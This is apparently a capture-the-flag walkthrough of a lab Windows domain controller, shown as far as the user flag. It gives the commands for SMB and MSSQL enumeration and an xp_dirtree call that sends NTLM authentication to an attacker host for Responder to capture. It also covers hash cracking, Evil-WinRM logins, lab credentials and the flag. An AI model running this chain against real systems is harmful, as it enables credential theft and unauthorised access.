Enumeration

Starting with a comprehensive nmap scan to discover all open ports and services:

sudo nmap -sS -sC -A 10.10.11.202 -T4 -oN first.scan -p- -Pn

Key Findings

The scan reveals a Windows Domain Controller running multiple services:

  • Port 53: DNS
  • Port 88: Kerberos
  • Port 389/636: LDAP (Domain: sequel.htb)
  • Port 445: SMB
  • Port 1433: Microsoft SQL Server 2019
  • Port 5985: WinRM

Domain identified: sequel.htb with hostname dc.sequel.htb

SMB Enumeration

Checking SMB shares as a guest user:

smbclient //10.10.11.202/Public

Found a publicly accessible share containing SQL Server Procedures.pdf. The PDF reveals database credentials:

  • Username: PublicUser
  • Password: GuestUserCantWrite1

Initial Access via MSSQL

Connecting to MSSQL

Using the discovered credentials to connect to the SQL Server:

impacket-mssqlclient PublicUser:[email protected]

Hash Capture with Responder

Exploiting xp_dirtree to force an NTLM authentication back to our attack box:

EXEC MASTER.sys.xp_dirtree '\\10.10.14.13\test', 1, 1

Start Responder to capture the authentication attempt:

sudo responder -I tun0 -v

Successfully captured NTLMv2 hash for user sql_svc:

sql_svc::sequel:6a1a93a00715eb34:25621106FDB7E05C6DA08AF595E36E69:...

Cracking the Hash

Using John the Ripper to crack the captured hash:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Cracked credentials: sql_svc:REGGIE1234ronnie

Foothold

WinRM Access

Using Evil-WinRM with the cracked credentials:

evil-winrm -i sequel.htb -u sql_svc -p "REGGIE1234ronnie"

Successfully gained a foothold as sql_svc. Found another user on the system: Ryan.Cooper

Lateral Movement

Manual Enumeration

While exploring the file system, discovered interesting SQL Server logs at:

C:\SQLServer\Logs\ERRORLOG.BAK

The log file contained failed login attempts revealing credentials:

2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. 
Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

The username appears to be associated with Ryan.Cooper based on previous log entries.

Discovered credentials: Ryan.Cooper:NuclearMosquito3

User Access

Connecting as Ryan Cooper via Evil-WinRM:

evil-winrm -i sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3'

Successfully authenticated and retrieved the user flag:

3463bc90be59c8a5efc8f6e459bcd5a4

Key Takeaways

  1. SMB enumeration revealed publicly accessible documentation containing credentials
  2. MSSQL xp_dirtree abuse allowed NTLM hash capture via Responder
  3. Log file enumeration exposed additional credentials for lateral movement
  4. WinRM provided remote access once valid credentials were obtained

Next Steps

With user-level access established, the next phase would involve privilege escalation to Administrator and obtaining the root flag.